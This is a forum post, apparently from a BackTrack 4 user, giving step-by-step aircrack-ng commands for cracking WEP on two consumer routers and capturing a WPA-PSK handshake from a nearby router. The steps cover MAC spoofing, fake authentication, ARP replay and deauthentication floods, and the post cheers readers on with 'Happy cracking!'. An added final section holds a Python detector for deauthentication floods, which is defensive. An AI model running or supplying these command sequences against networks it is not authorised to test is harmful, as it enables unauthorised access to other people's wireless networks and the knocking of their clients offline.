Hi, first post here! Just wanted to confirm that the Hawking HWUG1 works perfectly for WEP cracking in BT4 Beta running through VMWare on a Windows 7 64-bit system. Cracked a WRT54GL and a 2WIRE using WEP encryption. Purchased it from Amazon brand new for $31 with free 2-day shipping. Would highly recommend the HWUG1 to anybody looking for a great card with an SMA jack, not to mention it comes with a decent dipole antenna.
NOTE: WPA stuff at the bottom
====================== WEP =====================
====================== WEP =====================
The reason I'm posting this is that it is slightly different from BT3, which required the following command to work properly:
Code:
iwconfig rausb0 rate 1M
This command is no longer needed (unless the router is in a different mode, but through my test I never used this and it worked great on both routers one in 11b mode and the other in 54g mode). Also, I notice the device is named "rausb0", but in BT4b it's the generic "wlan0" I see in most tutorials; hence newbies have one less problem to worry about. Actually after researching the card I tried to use rausb0 in BT4b and it wasn't working so I tried wlan0 and it worked. Also I was pulling my hair out because I could not understand why it wasn't working until I tried it without that command and it worked!
Here are the exact commands I used:
Code:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c (channel) -w (filename) --bssid (BSSID) wlan0
No need to explain what's going on here, it's the same as any tutorial out there. So the data starts to rise slowly; in order to provoke it I had to research a bit, since nearly all guides used the -3 attack alone, which does not work well (at least for the 2 routers I tried). I kept getting a deauth/disassoc packet which stopped me from collecting data quickly. Maybe it was the routers, but what I did worked and so that's what I'm gonna go by.
Opened up a new tab and did the following:
Code:
aireplay-ng -1 6000 -0 1 -q 10 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0
Okay, this command here will constantly keep us authenticated/associated for 6000 seconds (every 10 seconds), with this we don't have to worry about the deauth/disassoc packets.
Now I opened up a 3rd tab and did the following:
Code:
aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0
Now go back to the 1st tab and watch the data rise quickly. I hit 60k in about 2 minutes. Then I cracked the file with success!
As you can see the biggest problem was the deauth/disassoc packets that I kept receiving which made provoking the data impossible. Maybe it was the router, maybe it was the device, but I did this for both routers with success so anyone using the HWUG1 should try this out if they are having trouble in BT4b.
BTW, I'm currently working on WPA-PSK cracking but I've run into some problems, will probably post about it later if I run out of ideas.
Happy cracking! 
===================== WPA =====================
===================== WPA =====================
Just successfully cracked a WPA TKIP PSK router nearby... So I'm adding it here instead of making a new thread.
Anyways here are the commands:
Code:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
airodump-ng wlan0
airodump-ng -c (channel) -w (filename) --bssid (BSSID) wlan0
Same old, same old...
Open up a new tab and do the following:
Code:
aireplay-ng -0 2 -a (BSSID) -c (client BSSID) wlan0
Also try this one in case you have trouble (actually I caught the handshake on this one, but it was probably a fluke or maybe I was impatient):
Code:
aireplay-ng -0 5 -a (BSSID) wlan0
Once you catch the handshake just crack it and you're good to go!
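From the defender's side, the recurring element in both the WEP and WPA walkthroughs above is the deauthentication/disassociation traffic: the poster fights it during the WEP run and deliberately generates it with aireplay-ng -0 during the WPA run. Below is an added example, not code from the original post or from the aircrack-ng project, showing how a wireless IDS can spot that burst in a monitor-mode capture. It parses the standard 802.11 management frame header (frame control, addresses, reason code) and flags a BSSID that sees a run of deauth/disassoc frames inside a short window. The frames and MAC addresses are constructed inline, and the example assumes the radiotap header has already been stripped so each frame starts at the 802.11 MAC header.

```python
import struct
from collections import defaultdict

# 802.11 frame-control first byte: bits 0-1 version, 2-3 type, 4-7 subtype.
# Management frames are type 0; the two subtypes a deauth detector cares about:
SUBTYPE_DISASSOC = 10
SUBTYPE_DEAUTH = 12
SUBTYPE_BEACON = 8
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample addresses (not taken from any real network).
AP_MAC = "00:aa:bb:cc:dd:01"
CLIENT_MAC = "00:aa:bb:cc:dd:02"


def _mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def _mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def build_mgmt_frame(subtype, dst, src, bssid, reason=None):
    """Build a minimal management frame: the 24-byte MAC header plus an
    optional 2-byte little-endian reason code (deauth/disassoc body)."""
    fc0 = (subtype << 4) | (0 << 2)           # type 0 = management
    frame = bytes([fc0, 0x00])                # frame control
    frame += b"\x00\x00"                      # duration / ID
    frame += _mac_bytes(dst) + _mac_bytes(src) + _mac_bytes(bssid)
    frame += b"\x00\x00"                      # sequence control
    if reason is not None:
        frame += struct.pack("<H", reason)
    return frame


def parse_frame(raw):
    """Decode the header fields the detector needs; None if too short."""
    if len(raw) < 24:
        return None
    fc0 = raw[0]
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    info = {
        "type": ftype,
        "subtype": subtype,
        "dst": _mac_str(raw[4:10]),
        "src": _mac_str(raw[10:16]),
        "bssid": _mac_str(raw[16:22]),
        "reason": None,
    }
    if ftype == 0 and subtype in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH) and len(raw) >= 26:
        info["reason"] = struct.unpack("<H", raw[24:26])[0]
    return info


def detect_deauth_flood(capture, window=5.0, threshold=5):
    """capture: iterable of (timestamp_seconds, raw_frame).
    Flags any BSSID that sees >= threshold deauth/disassoc frames within
    `window` seconds. Returns one alert dict per flagged BSSID."""
    recent = defaultdict(list)   # bssid -> [(ts, is_broadcast, reason)] inside window
    alerts = {}
    for ts, raw in sorted(capture, key=lambda item: item[0]):
        p = parse_frame(raw)
        if p is None or p["type"] != 0 or p["subtype"] not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            continue
        q = recent[p["bssid"]]
        q.append((ts, p["dst"] == BROADCAST, p["reason"]))
        while q and ts - q[0][0] > window:      # drop frames older than the window
            q.pop(0)
        if len(q) >= threshold:
            alerts[p["bssid"]] = {
                "bssid": p["bssid"],
                "count": len(q),
                "broadcast": sum(1 for _, b, _ in q if b),
                "reasons": sorted({r for _, _, r in q if r is not None}),
                "first_seen": q[0][0],
                "last_seen": ts,
            }
    return list(alerts.values())


def sample_capture():
    """Constructed capture: beacons, one genuine deauth, then a burst of
    broadcast deauths carrying the AP's own address as source (the pattern
    a client-less deauth like the -0 attack above produces)."""
    frames = []
    for i in range(50):                               # beacon every 100 ms
        frames.append((round(i * 0.1, 2), build_mgmt_frame(SUBTYPE_BEACON, BROADCAST, AP_MAC, AP_MAC)))
    # A single legitimate deauth (reason 3: station is leaving) at t=2.0
    frames.append((2.0, build_mgmt_frame(SUBTYPE_DEAUTH, CLIENT_MAC, AP_MAC, AP_MAC, reason=3)))
    # Burst: 8 broadcast deauths in 0.35 s, reason 7 (class 3 frame from non-associated STA)
    for i in range(8):
        frames.append((round(10.0 + i * 0.05, 2),
                       build_mgmt_frame(SUBTYPE_DEAUTH, BROADCAST, AP_MAC, AP_MAC, reason=7)))
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_flood(sample_capture()):
        print(alert)
```

The source address is no help here: a spoofed deauth carries the AP's own MAC, exactly as a real one would, so the detector keys on rate and on the broadcast destination rather than on who the frame claims to be from. A single deauth, like the one at t=2.0, stays below the threshold; the eight-frame burst trips it with every frame addressed to ff:ff:ff:ff:ff:ff. In practice the window and threshold would be tuned per site, and the same loop could be fed from a live monitor-mode interface instead of a list.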